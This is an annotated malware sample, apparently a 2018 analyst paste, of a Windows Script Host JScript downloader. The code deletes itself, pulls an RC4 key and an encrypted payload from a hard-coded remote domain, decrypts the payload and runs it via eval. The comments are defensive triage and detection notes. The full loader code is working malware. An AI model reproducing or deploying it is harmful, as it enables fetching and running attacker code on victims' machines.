dissectmalware

Malicious Javascript

Dec 25th, 2018
  // First stage of a Windows Script Host (JScript) downloader. This section
  // builds the two fetch URLs, creates the COM objects used further down, and
  // deletes the script's own file.
  //
  // Both URLs point at the hard-coded host in `domurl`; the path is the current
  // epoch-millisecond timestamp with a media-style extension (.flv / .mp4).
  // The rest of the script reads both responses as text (ResponseText): the
  // .flv response supplies an id and a key, the .mp4 response supplies
  // hex-encoded ciphertext.
  1. var domurl = "gae3emightymagoo.com";
  2. addr1 = "https://"+domurl+"/"+(new Date()).getTime()+".flv";
  3.  addr = "https://"+domurl+"/"+(new Date()).getTime()+".mp4";
  4.  
  5.  
  // COM objects. Only `m` (HTTP client) and `f` (file system) are used in the
  // visible script. `a` (WScript.Shell) is created but never referenced here;
  // presumably it is meant for the code passed to eval() at the end, which runs
  // with these global names in scope. Confirm against the decrypted payload.
  6. a = new ActiveXObject('WScript.Shell');
  7.  
  8. m = new ActiveXObject("MSXML2.XMLHTTP");
  9.  
  10. f = new ActiveXObject("Scripting.FileSystemObject");
  11.  
  // Self-deletion: WScript.ScriptFullName is the full path of the running
  // script, which is removed if it exists. Any error is silently swallowed.
  // Triage note: the original file is likely absent from disk after it has run,
  // so recover the sample from the delivery channel or endpoint telemetry.
  12. try{
  13. c=WScript.ScriptFullName;
  14. if(f.FileExists(c))f.DeleteFile(c);
  15. }
  16. catch(e){}
  17.  
  // Request 1: fetch the id and key. Up to five synchronous GETs (third open()
  // argument is false) of the .flv URL, each with a fresh `?t=<epoch ms>` query
  // value. An exception from open()/send() causes a 5-second sleep and a retry;
  // the first send() that does not throw ends the loop. The HTTP status is
  // never checked, so any response body is accepted.
  //
  // Detection note: the script issues two consecutive HTTPS GETs to the same
  // host, `/<epoch-ms>.flv?t=<epoch-ms>` then `/<epoch-ms>.mp4?t=<epoch-ms>`,
  // from Windows Script Host (the script depends on the WScript object). The
  // path timestamps are fixed when the URLs are built; only `t` changes per
  // attempt.
  18. for(var i=1;i<=5;i++){
  19. try{
  20. m.open("GET", addr1+"?t="+(new Date()).getTime(), false);
  21. m.send(null);
  22. break;}
  23. catch(e)
  24. {
  25. WScript.Sleep(5000);
  26. }
  27. }
  28.  
  // Response layout as consumed here: characters 0-2 are `id`, everything after
  // that is `key` (used as the RC4 key further down). `id` is not referenced
  // again in this listing; presumably the eval'd second stage reads it.
  // Confirm against the decrypted payload.
  29. key=m.ResponseText.substring(3);
  30. id=m.ResponseText.substring(0,3);
  31.  
  // Request 2: same five-attempt retry pattern against the .mp4 URL. The body
  // is kept as `encoded` and treated as a hex string by the code that follows.
  32. for(var i=1;i<=5;i++)
  33. {
  34. try{
  35. m.open("GET", addr+"?t="+(new Date()).getTime(), false);
  36. m.send(null);
  37. break;
  38. }
  39. catch(e)
  40. {
  41. WScript.Sleep(5000);
  42. }
  43. }
  44. encoded=m.ResponseText;
  45.  
  // Hex-decode the second response: each pair of hex digits in `encoded`
  // becomes one character (code 0-255) appended to `crypted`. The input is not
  // validated as hex.
  46. crypted="";
  47.  
  48. for(i=0;i<encoded.length;i+=2)
  49.     crypted+=String.fromCharCode(parseInt(encoded.substr(i,2),16));
  50.  
  // `cyphered` is a second name for the same decoded string; no transformation.
  51. cyphered=crypted;
  52.  
  // RC4 decryption of `cyphered` using the server-supplied `key`.
  //
  // Analyst note: the key and the ciphertext both arrive from the server at run
  // time, so the second stage cannot be recovered from this file alone.
  // Offline decryption needs both response bodies (for example from a proxy
  // capture of the .flv and .mp4 requests).
  53. var rc4table = [], counter2 = 0, tmp, decrypted = "";
  54.  
  // Key scheduling, step 1: start from the identity permutation 0..255.
  55. for (var counter = 0; counter < 256; counter++)
  56. {rc4table[counter] = counter;}
  57.  
  // Key scheduling, step 2: shuffle the table with the key bytes, which repeat
  // cyclically via `counter % key.length`.
  58. for (counter = 0; counter < 256; counter++)
  59.  {
  60.  counter2 = (counter2 + rc4table[counter] + key.charCodeAt(counter % key.length)) % 256;
  61.  tmp = rc4table[counter];
  62.  rc4table[counter] = rc4table[counter2];
  63.  rc4table[counter2] = tmp;
  64.  }
  65.  
  // Reset both indices before generating the keystream.
  66.  counter = 0;
  67.  counter2 = 0;
  68.  
  // Keystream generation: for each ciphertext character, advance the indices,
  // swap two table entries, and XOR the character with the selected table
  // byte. The plaintext accumulates in `decrypted`.
  69.  for (var counter3 = 0; counter3 < cyphered.length; counter3++)
  70.  {
  71.  counter = (counter + 1) % 256;counter2 = (counter2 + rc4table[counter]) % 256;tmp = rc4table[counter];
  72.  rc4table[counter] = rc4table[counter2];rc4table[counter2] = tmp;
  73.  decrypted += String.fromCharCode(cyphered.charCodeAt(counter3) ^ rc4table[(rc4table[counter] + rc4table[counter2]) % 256]);
  74.  }
  75.  
  // SECURITY: runs the decrypted, server-supplied text as script code in the
  // current scope, so it can use the `a`, `m`, `f`, `key` and `id` globals
  // created earlier. Nothing in this listing writes the second stage to disk;
  // as far as this script is concerned it exists only in memory. When analysing
  // the sample in an isolated sandbox, dump `decrypted` instead of executing it.
  76. eval(decrypted);